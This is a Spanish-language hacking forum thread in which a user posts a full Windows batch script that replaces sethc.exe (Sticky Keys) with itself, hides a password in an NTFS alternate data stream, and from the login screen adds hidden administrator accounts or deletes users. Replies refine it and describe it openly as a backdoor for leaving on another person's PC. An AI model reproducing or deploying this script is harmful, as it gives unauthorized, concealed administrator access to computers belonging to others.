Escalador de Privilegios - by :: SmartGenius ::

[:: SmartGenius ::]

Este es el code mas o menos que tengo para el escalador de privilegios que queria aportar para la version de Windows de el-hacker...

Quisiera que lo analizaran y me dijeran los posibles errores y mejoras, para que esta tambien llegue a ser una gran utilidad..  



Codigo:

Código:

mode con cols=70
mode con lines=20
    @echo off
title Comunidad UnderGround Hispana - Escalador de Privilegios
color 0a

if exist "%windir%\system32\sethc.lz0" (goto load) else (goto ins)

:ins
echo.
echo  Aun no se ha modificado el Sistema..
echo.
echo  Presione una Tecla para realizar el Procedimiento, o salga
echo  del programa si lo desea...
pause > nul
copy "%windir%\system32\sethc.exe" "%windir%\system32\sethc.lz0"
del /f "%windir%\system32\sethc.exe"
copy %0 "%windir%\system32\sethc.exe"
echo ni7vtyk3t3hd2mkniyk3t3hd2mhd2mt3>>"%windir%\system32\shell32.dll:admin.cuh"
cls
echo.
echo   ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo   º El cambio del archivo del Sistema usado para º
echo   º la Escalada de privilegios se ha realizado   º
echo   º satisfactoriamente, tendra efecto la proxima º
echo   º vez que vaya a Iniciar sesion...             º
echo   ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo  Desea ver la Ayuda del Programa: Si [s] No [N]
echo.
set /p opc="> "
if %opc%==s call :help 2
if %opc%==S call :help 2
if %opc%==n (echo.&echo  Gracias por Usar este Programa&pause&exit)
if %opc%==N (echo.&echo  Gracias por Usar este Programa&pause&exit)

:load
cls
for /F "tokens=*" %%a in (%windir%\system32\shell32.dll:admin.cuh) do set conf=%%a
echo.
echo           ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo           º  Escalada de Privilegios - CUH el-hacker.com º
echo           ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo. El Programa se encuentra Protegido
echo. Por Favor Introduzca su Clave!
set /p q="Password > "
call :cript %q%
if %v%==%conf% (goto ini) else (cls&echo.&echo  Clave Invalida...&echo.&echo  Vuelva a Intentarlo&pause&goto load)

:ini
cls
echo.
echo           ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo           º  Escalada de Privilegios - CUH el-hacker.com º
echo           ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo    Elija una Opcion:
echo.
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿          ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³1³ ³ Agregar un Usuario.. ³          ³2³ ³ Esconder un usuario. ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ          ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿          ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³3³ ³ Eliminar un Usuario. ³          ³4³ ³ Ver Ayuda - Creditos ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ          ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³5³ ³ Salir del Programa.  ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo.
set /p opc="> "
if "opc"=="" (goto :ini)
set opc=%opc: =_%
set opc=%opc:&=_%
set opc=%opc:¡=_%

if %opc%==1 goto addadmin
if %opc%==2 goto hideuser
if %opc%==5 goto fin
if %opc%==4 call :help 1
if %opc%==3 (goto :delete) else (goto :err)

:err
cls
echo.
echo  ERROR...
echo.
echo  No ha escogido una Opcion Correcta
echo  Vuelva a Intentarlo
echo.
pause
goto ini

:addadmin
cls
echo.
echo   ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo    Escriba el Nombre del Nuevo usuario  
echo   ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p admin="> "
echo.
echo      Escriba el la Clave para el Usuario: %admin%
echo.
set /p clave="> "
net user "%admin%" "%clave%" /add
net localgroup Administradores %admin% /add
echo.
echo    ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo    º       Usuario Agregado Con Exito         º
echo    ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
pause >nul
goto ini

:delete
cls
echo.
echo  Escriba El Nombre Del Usuario a Borrar:
echo.
set /p usdel="> "
net user "%usdel%" /delete
cls
echo.
echo  Usuario Borrado Con Exito.
echo.
pause
goto ini

:hideuser
echo.
echo  Escrilba la Cuenta o Nombre de Usuario
echo  que desea esconder de la pantalla de
echo  Inico de Sesion...
echo.
set /p hiden="> "
reg add "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccount\UserList" /v "%hidden%" /t REG_DWORD /d 0 /f
echo.
echo  El Usuario %hidden% fue Ocultado con Exito...
echo.
pause
goto ini

:help
cls
echo.
echo           ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo           º  Escalada de Privilegios - CUH el-hacker.com º
echo           ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo  Seccion de Ayuda
echo  ____________
echo  ____________
echo  ____________
echo  ____________
echo  Como se pueden dar cuenta, soy malo para las ayudas,
echo  asi que podrian ayudarme ustedes...
echo.
echo   :: SmartGenius :: - powered by iSmart, Corp.
echo.
echo  Presione Cualquier tecla para continuar ¡
pause > nul
if %1==1 set ir=ini
if %1==2 set ir=fin
goto %ir%

:cript
set v=%1
set v=%v:&=_%
set v=%v: =_%
set v=%v:^=_%
set v=%v:#=_%
set v=%v:-=t%
set v=%v:.=a%
set v=%v:a=23%
set v=%v:e=ni%
set v=%v:h=r%
set v=%v:r=y%
set v=%v:c=mo%
set v=%v:d=z%
set v=%v:1=+%
set v=%v:2=k%
set v=%v:b=na%
set v=%v:d=15%
set v=%v:m=t3%
set v=%v:o=sm%
set v=%v:s=hd2%
set v=%v:l=7v%
goto :eof

:fin
echo MsgBox "Gracias por usar este Programa... ;)"^&vbCrLf^&vbCrLf^&"Para mas Info visita"^&vbCrLf^&"http://foro.el-hacker.com", 64, "Escalador de Privilegios" >>%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

La clave: Adivinenla ¡¡ xD

Edito:

ya lo he "compilado" a exe...

para que lo usen...


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

Saludos.

[ECDundy]

Tu solucion a la encriptacion es valida, pero siempre sustitulle en el mismo lugar.La condicion mas inteligente es usar el ramdom y dividirlo entre 2 si el resto da 0 haces algo y si da 1 haces otra cosa y asi consigues una encriptacion aleatoria luego vas guardando los distintos valores de resto y te quedaria un numero binario el cual puedes guardar y con el desencriptar el contenido en un proceso inverso.
Ahora podrias explicar un poco como funciona esa escalada de privilegios?

[sami]

No quiero fastidiar a nadie pero eso mas que una escalada de privilegios es una bonita backdoor.

Es decir, nos permite acceder a un sistema a traves del metodo del sethc pero no es escalada de privilegios pq para que tenga exito, el programa ya ha de ser ejecutado ocn suficientes privilegios.

Pese a todo la aplicacion es buena si queremos dejar una puerta trasera en otro pc.
Seria escalada de privilegios si el sethc se modifica en un sistma en el que no tenemos privilegios, para lo cual necesitamos un live cd del knoppix o el erd commander etc...

[Espectro Infernal]

Gracias por el aporte, acabo de mirarme ahora a simple vista lo de la password.

No parece muy complicado, aún así no la he conseguido descifrar xD tengo un problema con las "m". Voy a seguir intentandolo. Has comprobado si la pass funciona?

Bytes, Espectro Infernal.

[:: SmartGenius ::]

No quiero fastidiar a nadie pero eso mas que una escalada de privilegios es una bonita backdoor.

Es decir, nos permite acceder a un sistema a traves del metodo del sethc pero no es escalada de privilegios pq para que tenga exito, el programa ya ha de ser ejecutado ocn suficientes privilegios.

Pese a todo la aplicacion es buena si queremos dejar una puerta trasera en otro pc.
Seria escalada de privilegios si el sethc se modifica en un sistma en el que no tenemos privilegios, para lo cual necesitamos un live cd del knoppix o el erd commander etc...

No es que molestes a nadie men, todo lo contrario, son criticas constructivas  , eso hace que con su ayuda pueda mejorar mis codes...

Gracias por el aporte, acabo de mirarme ahora a simple vista lo de la password.

No parece muy complicado, aún así no la he conseguido descifrar xD tengo un problema con las "m". Voy a seguir intentandolo. Has comprobado si la pass funciona?

Bytes, Espectro Infernal.

Pero claro que la pass funciona, no lo hubiera puesto de no ser asi.... lo hice porque considere que ya estaba completo, pero segun lo que he leido existen otros metodos tambien aplicables al batch por los cuales se pueden escalar privilegios....

Sea backdoor o como quieran llamarle, yo lo que queria era aportar, y que a partir de esto mejoremos el code y hagamos una tool de buena calidad...

Confio en que entre todos podemos hacerlo...

Saludos.

PD: La clave es superfacil, lo que pasa es que hay una o dos variables que cambian dos veces, y ademas esta gurdada mediante ADS...

[Espectro Infernal]

Ahá ya tengo el pass xD Bueno, el programa se ve bien, me gusta como hicistes los menus. Y el uso del mode:

mode con cols=70
mode con lines=20

Para dejar la ventanita en la medida exacta para que los menús queden bien encajados. Felicidades

Aún así, podrías ahorrarte alguna línea si en vez de comprobar si el user escribio s o S (mayuscula o sin mayuscula) usases:

IF /I %var%=S  (y servirá tanto para mayúscula como para minúscula)

Bytes, Espectro Infernal.

[:: SmartGenius ::]

Aún así, podrías ahorrarte alguna línea si en vez de comprobar si el user escribio s o S (mayuscula o sin mayuscula) usases:

IF /I %var%=S  (y servirá tanto para mayúscula como para minúscula)

Bytes, Espectro Infernal.

Bien, esto lo habia leido pero no lo habia aplicado....

Para los que no pudieron sacar la clave, solo decirles que era muy sencilla: el-hacker.com

Buneo, y como ya dije, den ideas para mejorar el programa, para hacerlo mas efectivo, yo se que esta que yo use no es la unica tecnica para escalar privilegios...

Saludos.

[Espectro Infernal]

Bueno, el método que usaste para encriptar la password es un poco ambiguo. Por ese mismo modo, no solo la password:

el-hacker.com

Es válida, sinó que también lo sería:

el-r23mo2er23moom

Todo depende de como vayas jugando con el flujo del código y el orden de la manipulacion de las variables. Por eso recomendaria, al usar este tipo de codificación, mirar de resolver el conflicto de diversas formas y ver si más de una password puede ser válida

Bytes, Espectro Infernal.

[Espectro Infernal]

Porcierto, me dí cuenta de que hay un pequeño error... :S Al ejecutar el programa una vez, el msgbox hecho en vbs se ejecuta correctamente. Si vuelves a iniciar el programa y a salir de el, el msgbox se ejecuta dos veces.

La tercera vez que abras el programa para usarlo y salgas de éste, el mensaje aparecerá 3 veces, y así succesivamente...

Esto lo arreglaría cambiando la línea:

echo MsgBox "Gracias por usar este Programa... "^&vbCrLf^&vbCrLf^&"Para mas Info visita"^&vbCrLf^&"
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion", 64, "Escalador de Privilegios" >>%temp%\msgr.vbs

Y ponerla así:

echo MsgBox "Gracias por usar este Programa... "^&vbCrLf^&vbCrLf^&"Para mas Info visita"^&vbCrLf^&"
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion", 64, "Escalador de Privilegios" >%temp%\msgr.vbs

De este modo, no se irán guardando en cada salida del programa instrucciones en el .vbs. Del primer modo, en cada salida del programa el archivo a ejecutar guardaba la instruccion: msgbox, y al no usar ">" y usar ">>" se ivan añadiendo msgbox al archivo vbs. De este modo se soluciona el problema.

Bytes, Espectro Infernal.

[ECDundy]

Smart puedes por favor explicar como funciona esta backdoor o como tu la llamas escalada de privilegios? Por favor

[:: SmartGenius ::]

Bueno, el método que usaste para encriptar la password es un poco ambiguo. Por ese mismo modo, no solo la password:

el-hacker.com

Es válida, sinó que también lo sería:

el-r23mo2er23moom

Todo depende de como vayas jugando con el flujo del código y el orden de la manipulacion de las variables. Por eso recomendaria, al usar este tipo de codificación, mirar de resolver el conflicto de diversas formas y ver si más de una password puede ser válida

Bytes, Espectro Infernal.

Maestro

Eso es lo que queria, que lo revisaran y dieran con cositas... xD

Porcierto, me dí cuenta de que hay un pequeño error... :S Al ejecutar el programa una vez, el msgbox hecho en vbs se ejecuta correctamente. Si vuelves a iniciar el programa y a salir de el, el msgbox se ejecuta dos veces.

La tercera vez que abras el programa para usarlo y salgas de éste, el mensaje aparecerá 3 veces, y así succesivamente...

Esto lo arreglaría cambiando la línea:

echo MsgBox "Gracias por usar este Programa... "^&vbCrLf^&vbCrLf^&"Para mas Info visita"^&vbCrLf^&"
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion", 64, "Escalador de Privilegios" >>%temp%\msgr.vbs

Y ponerla así:

echo MsgBox "Gracias por usar este Programa... "^&vbCrLf^&vbCrLf^&"Para mas Info visita"^&vbCrLf^&"
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion", 64, "Escalador de Privilegios" >%temp%\msgr.vbs

De este modo, no se irán guardando en cada salida del programa instrucciones en el .vbs. Del primer modo, en cada salida del programa el archivo a ejecutar guardaba la instruccion: msgbox, y al no usar ">" y usar ">>" se ivan añadiendo msgbox al archivo vbs. De este modo se soluciona el problema.

Bytes, Espectro Infernal.

De este error tambien me di cuenta ahora que lo estuve probando, pero no es tan grave... solo quitar un >...

Gracias por tu ayuda man...

Yo tambien me di cuenta de un posible error y es que a veces cuando borra el archivo sethc, nuestro code se copia asi mismo como este, pero despues d eunos segundos actua la proteccion de archivos de windows y reestaura el sethc original que se guarda en la dll cache..

Smart puedes por favor explicar como funciona esta backdoor o como tu la llamas escalada de privilegios? Por favor

Este archivo lo que hace es reemplazar el archivo sethc.exe por nuestro code, asi, por ejemplo, vamos a iniciar sesion y no sabemos la clave entonces se presiona 5 veces shift y saldria la cmd (el truco original es asi)... pero mejor lo puse de esta manera para que sea mas facil agregar un usuario admin, y de igual manera ocultarlo de la pantalla de inicio...

fijate en el post de mi blog
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion...

Saludos.